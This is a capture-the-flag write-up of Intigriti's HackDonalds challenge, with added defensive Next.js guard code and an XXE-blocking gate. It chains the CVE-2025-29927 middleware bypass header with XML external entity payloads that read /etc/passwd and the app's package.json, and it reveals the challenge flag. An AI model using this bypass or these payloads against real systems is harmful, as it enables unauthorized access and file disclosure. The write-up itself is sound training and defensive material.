# 0425: HackDonalds

| Name                                                                 | Authors                                                                                 | Category                                           |
| -------------------------------------------------------------------- | --------------------------------------------------------------------------------------- | -------------------------------------------------- |
| [Intigriti April Challenge (2024)](https://hackdonalds.intigriti.io) | [Bastien](https://twitter.com/_bastiendm) + [CryptoCat](https://twitter.com/_CryptoCat) | NextJS Middleware Auth Bypass, CVE-2025-29927, XXE |

[![](https://img.youtube.com/vi/KwD_TKZr0YY/0.jpg)](https://www.youtube.com/watch?v=KwD_TKZr0YY)

## Challenge Description

> Find the FLAG and win Intigriti swag! 🏆

## Useful Resources

* [Next.js Middleware Auth Bypass (CVE-2025-29927)](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware)
* [XML External Entity Injection (XXE)](https://portswigger.net/web-security/xxe)

## Solution

Bastien (BAS10) made most of this challenge. I (CryptoCat) just made the UI *cough* ChatGPT *cough* and fixed a few bugs/unintended solutions. It's a lot easier than the typical Intigriti monthly challenge - thankfully, as it came only a week after the crazy chain by 0x999 in the [March '25 challenge](https://bugology.intigriti.io/intigriti-monthly-challenges/0325). Therefore, this one was run more informally, without all the usual prizes, promo, domain name etc.

### Recon

The challenge did not come with source code, so we must follow a black-box approach.

#### Site Functionality

The website doesn't appear to have a lot of functionality; there's a homepage and a food menu.

![](/files/rYX6tkUOdXJGqfHAqc2Z)

![](/files/g3TYEb7KCqXPwL0QBvDX)

There's also an admin section which, as hackers, should be interesting to us.

![](/files/uktGUhof8S7KpRh64KKf)

We might try some basic SQLi, default/common passwords, etc., but it will get us nowhere. Digging into the client-side code is also fairly unproductive: since it's a NextJS application, the bundled code is hard to read and most of the important logic lives on the server side.

![](/files/p5K7uaBvGzNg0RDWh00V)

Wait, NextJS? Weren't there some [crazy vulns](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware) discovered in it recently 🤔 Let's check the version with Wappalyzer 👀

![](/files/31gcbiGiiObDxOZ1f2B4)

Back to the advisory:

**CVE-2025-29927** affects **all Next.js versions from 11.1.4 up to 15.1.7** and allows **middleware bypass** via a specially crafted `x-middleware-subrequest` header.

Vulnerability confirmed ✅

### Next.js Middleware Auth Bypass (CVE-2025-29927)

Middleware in Next.js is commonly used for:

* Authentication / Authorization
* Rewrites / Redirects
* Adding security headers (CSP, etc.)

This vulnerability allows attackers to **bypass middleware protections entirely**, leading to:

* **Authorization bypass**
* **Content Security Policy (CSP) bypass**
* **DoS via Cache Poisoning (CPDoS)**

An auth bypass would be perfect for us! Maybe it can get us into the admin panel without knowing the password?

Let's request the `/admin` page while including the following HTTP header.

```http
x-middleware-subrequest: middleware
```
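From the defensive side, the fix is to upgrade Next.js, but Vercel's advisory also recommends keeping external requests that carry `x-middleware-subrequest` away from the application when patching is not immediately possible. The following is an added example (not code from the challenge or from Next.js) of an edge-side guard that does exactly that and doubles as a detection rule over recorded traffic. The request/response shape follows `node:http`; `SAMPLE_REQUESTS` and the `hackdonalds.example` host are constructed for the example.

```javascript
// Added example (not code from the challenge or from Next.js): an edge-side
// guard for the x-middleware-subrequest header abused in CVE-2025-29927.
// The header is meant for Next.js's own internal subrequests, so a request
// arriving from the internet with it set is either misconfiguration or an
// attack. Blocking such requests before they reach the app is the advisory's
// stop-gap when patching is not possible; this guard implements that.
// Node.js, standard library only; request/response shapes follow node:http.

const BLOCKED_HEADER = 'x-middleware-subrequest';

// Find the header key as it actually appears (node:http lower-cases incoming
// header names, but a proxy or log format may preserve the client's casing).
function findBlockedHeaderKey(headers) {
  return Object.keys(headers).find((k) => k.toLowerCase() === BLOCKED_HEADER);
}

// Decide what to do with one request: forward it, or block it and say why.
function classifyRequest(req) {
  const key = findBlockedHeaderKey(req.headers);
  if (key === undefined) return { action: 'forward', reason: null };
  return { action: 'block', reason: `${BLOCKED_HEADER}=${req.headers[key]}` };
}

// Detection: run the same rule over recorded requests (e.g. a proxy log that
// keeps request headers) and return only the bypass attempts.
function findBypassAttempts(requests) {
  return requests
    .map((r) => ({ req: r, verdict: classifyRequest(r) }))
    .filter(({ verdict }) => verdict.action === 'block')
    .map(({ req, verdict }) => ({ method: req.method, url: req.url, reason: verdict.reason }));
}

// Wrap a (req, res) handler so blocked requests get a 403 and never reach the
// upstream app. `log` is injectable so the guard can be exercised without printing.
function createGuard(upstream, log = console.warn) {
  return (req, res) => {
    const verdict = classifyRequest(req);
    if (verdict.action === 'block') {
      log(`blocked ${req.method} ${req.url}: ${verdict.reason}`);
      res.writeHead(403, { 'content-type': 'text/plain' });
      res.end('Forbidden');
      return;
    }
    upstream(req, res);
  };
}

// Constructed sample traffic: a normal visitor, the bypass request from the
// write-up above, and a legitimate admin request carrying a session cookie.
const SAMPLE_REQUESTS = [
  { method: 'GET', url: '/', headers: { host: 'hackdonalds.example', 'user-agent': 'Mozilla/5.0' } },
  { method: 'GET', url: '/admin', headers: { host: 'hackdonalds.example', 'X-Middleware-Subrequest': 'middleware' } },
  { method: 'GET', url: '/admin', headers: { host: 'hackdonalds.example', cookie: 'session=constructed' } },
];
```

To put the guard in front of a real app, wrap whatever handler proxies to Next.js: `http.createServer(createGuard(proxyHandler)).listen(8080)`. Because the rule is a pure function of the request, the same `classifyRequest` can be replayed over historical proxy logs that record headers, which is how you would look for earlier bypass attempts after patching.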

![](/files/eb5HlD6mqu99HQtwUjWy)

Easy! Now we just need to include this header on each request to maintain our access 😎

![](/files/ItLPXhceerEfaAukbDkd)

We can only click on the `Ice Cream Machines` option, which allows us to view the settings of various machines (notoriously buggy/broken at HackDonalds 👀).

![](/files/X4xXJXBO2cTMygsHZjqK)

### XML External Entity Injection (XXE)

So, what do we have here? An XML config input that can be parsed.

![](/files/K2Ga5R27L6CZ5VX57q7F)

![](/files/tIe3sxdPDXAgifW3UsFd)

Any CTF player or bug bounty hunter should know what to check for here; XXE 👇

**XXE (XML External Entity)** is a vulnerability that occurs when an XML parser **processes external entities** defined in XML documents. If not properly configured, it can be exploited to:

* **Read local files** (`file:///etc/passwd`)
* **Perform SSRF** (e.g., hitting internal services)
* **DoS** via "billion laughs" attack
* **Exfiltrate data** via out-of-band channels (OAST, DNS, etc.)

If we replace the parsed input with a payload to read `/etc/passwd`:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>
```

We successfully retrieve the file contents!
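The fix on the application side is to configure the XML parser to ignore DTDs and never resolve entities. As an added example (not the challenge's code), the gate below shows the defense-in-depth layer that can sit in front of whatever parser the settings page uses: it refuses any config that declares a DTD, declares an entity (internal or external), or references a non-predefined entity, since the flat `<machine>` schema needs none of those. `loadMachineConfig` and its tag extraction are assumptions about the app; `BENIGN_CONFIG` is constructed, and `XXE_CONFIG` is the payload from above used only as a test input.

```javascript
// Added example, not code from the challenge: a defense-in-depth gate that
// inspects the ice-cream-machine config before it reaches an XML parser.
// The proper fix is still to configure the parser to ignore DTDs and never
// resolve entities; this gate additionally refuses any document that declares
// a DTD or references a non-predefined entity, since the <machine> schema
// never needs either. Node.js, standard library only. loadMachineConfig and
// its flat tag extraction are assumptions about the app, not its real code.

const PREDEFINED_ENTITIES = new Set(['lt', 'gt', 'amp', 'quot', 'apos']);

// Return { safe, findings }. The patterns are deliberately broad: a false
// positive refuses one config upload, a false negative would be a file read.
function inspectXml(xml) {
  const findings = [];
  if (/<!DOCTYPE\b/.test(xml)) findings.push('doctype declared');
  // <!ENTITY name ...> (general) and <!ENTITY % name ...> (parameter);
  // SYSTEM/PUBLIC marks an external identifier, i.e. a URL the parser would fetch.
  for (const m of xml.matchAll(/<!ENTITY\s+(%\s*)?([^\s>]+)\s+([^>]*)>/g)) {
    const [, param, name, body] = m;
    const kind = param ? 'parameter' : 'general';
    const ext = /\b(SYSTEM|PUBLIC)\b/.test(body) ? ' with external identifier' : '';
    findings.push(`${kind} entity "${name}" declared${ext}`);
  }
  // References to entities other than the five predefined ones; numeric
  // character references (&#...;) start with '#' and do not match.
  const referenced = new Set();
  for (const m of xml.matchAll(/&([A-Za-z_][\w.-]*);/g)) {
    if (!PREDEFINED_ENTITIES.has(m[1])) referenced.add(m[1]);
  }
  for (const name of referenced) findings.push(`reference to custom entity "${name}"`);
  // Parameter entity references only have meaning inside a DTD; flag them too.
  for (const m of xml.matchAll(/%([A-Za-z_][\w.-]*);/g)) {
    findings.push(`parameter entity reference "%${m[1]};"`);
  }
  return { safe: findings.length === 0, findings };
}

// Pull one text-only child element out of the flat <machine> document.
function textOf(xml, tag) {
  const m = xml.match(new RegExp(`<${tag}>([^<]*)</${tag}>`));
  return m ? m[1].trim() : null;
}

// Gate first, then read the fields the settings page displays.
function loadMachineConfig(xml) {
  const verdict = inspectXml(xml);
  if (!verdict.safe) {
    throw new Error(`rejected machine config: ${verdict.findings.join('; ')}`);
  }
  return {
    id: Number(textOf(xml, 'id')),
    name: textOf(xml, 'name'),
    temperature: Number(textOf(xml, 'temperature')),
    mixLevel: Number(textOf(xml, 'mixLevel')),
    lastMaintenance: textOf(xml, 'lastMaintenance'),
    cleaningSchedule: textOf(xml, 'cleaningSchedule'),
  };
}

// Constructed sample: a normal config as the settings page would submit it.
const BENIGN_CONFIG = `<?xml version="1.0" encoding="UTF-8"?>
<machine>
  <id>1</id>
  <name>Machine 1</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>`;

// The payload from the write-up above, used here only as a test input for the gate.
const XXE_CONFIG = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>`;
```

Run against `XXE_CONFIG`, `inspectXml` reports the DOCTYPE, the external `xxe` entity and the `&xxe;` reference, and `loadMachineConfig` throws before any parser sees the document; the benign config passes and is read normally. The gate also refuses purely internal entity declarations, which covers the "billion laughs" expansion case listed above, and flags parameter-entity syntax, which the out-of-band variants rely on.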

![](/files/ksJJp5VAbFEIwi2aSBz9)

#### Local File Read (Source Code Disclosure)

Where is the flag though? In a real world scenario, we might look for common files of interest (plenty of wordlists online). Since we know this is a NextJS app, why don't we ask ChatGPT what the common location is and what interesting files it might have?

![](/files/jcPNhLiPf1wj0tl0Fbnq)

Nice, so we can try enumerating all of these files starting with the `/app/` directory 😼

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE machine [
  <!ENTITY xxe SYSTEM "file:///app/package.json">
]>
<machine>
  <id>1</id>
  <name>&xxe;</name>
  <temperature>-18</temperature>
  <mixLevel>75</mixLevel>
  <lastMaintenance>2025-03-15</lastMaintenance>
  <cleaningSchedule>Daily</cleaningSchedule>
</machine>
```

![](/files/xQErgBQ56KbaOKPOYHNi)

There we have our flag: `INTIGRITI{XXE_1n_Ic3Cr34m_M4ch1n3s}` 🚩

Some players retrieved the same file from `/proc/self/cwd/package.json` or simply `package.json`.

## Community Writeups

1. [r0guebyte](https://rentry.co/r0gue-writeup-hackdonalds-dad1001f-2238-49ce-80e0-952a0a1cb944)
2. [excile](https://gist.github.com/excile1/56044173c39a28635f547f3bbedf05b5)
3. [gurux090](https://gurudattchoudhary.medium.com/intigriti-hackdonalds-ctf-writeup-chaining-next-js-fa0d8f6acbef)
4. [wa1m3im](https://gist.github.com/Wa1m3im/b0d1a087a9e363d66fc50cfdb8ea705f)
5. [optybg](https://www.notion.so/HackDonalds-Challenge-Writeup-1d39b56cbe8880ccb168ff03a9f60c8e?pvs=4)
6. [gilsgil](https://intigriti.hatamotosec.com/hackdonalds-writeup/ec4ac52ad1c4c88f1588fa68510cbaf8.html)
7. [boffman](https://gist.github.com/boffman/258bf6b13d59cbcfa507b15b414c3b2d)
8. [harshilsecops](https://medium.com/@harshilsecops/820933e85d99)
9. [ruur](https://ruur.gitbook.io/ctf-writeups/ctf-writeups/hackdonalds-intigriti)
10. [nagasaikiran](https://nagasaikiran.com/hackdonalds-challenge-writeup)
11. [khandlq](https://www.notion.so/Challenge-https-app-intigriti-com-programs-intigriti-challenge-hackdonalds-detail-1d0fde163055800cb1f1fbe8dff8f666?pvs=4)
12. [priesthood\_singh](https://medium.com/@adityagulati07/intigriti-hackdonalds-challenge-cb8d7e60ee7c)
13. [mami](https://github.com/MaMi364/Hackdonalds-Intigriti)
14. [roys](https://github.com/roys/ctf-writeups/tree/main/intigriti-2025-04)
15. [cybersecu](https://gist.github.com/Siss3l/7a6b55978214325f60464f4f92ecce07)
16. [juniorbrets](https://medium.com/@cipher01x/breaking-into-hackdonalds-xxe-middleware-abuse-ctf-writeup-5e67fadbb1bd)
17. [rishal865](https://www.linkedin.com/posts/mohammed-rishal-0453a8212_hackdonalds-ctf-activity-7318131723127468033-ilJJ)
18. [vilz](https://github.com/LuisVila99/hackdonalds)
19. [cybrik](https://medium.com/@shreechandragiri21/hacking-hackdonalds-from-auth-bypass-to-xxe-my-3-hour-midnight-frenzy-0a5e120af2b2)
20. [cybercrusader](https://medium.com/@vighnesh.cybersec/breaking-the-ice-cream-machines-a-hackdonalds-ctf-story-of-auth-bypass-and-xml-shenanigans-4d648eab7f33)
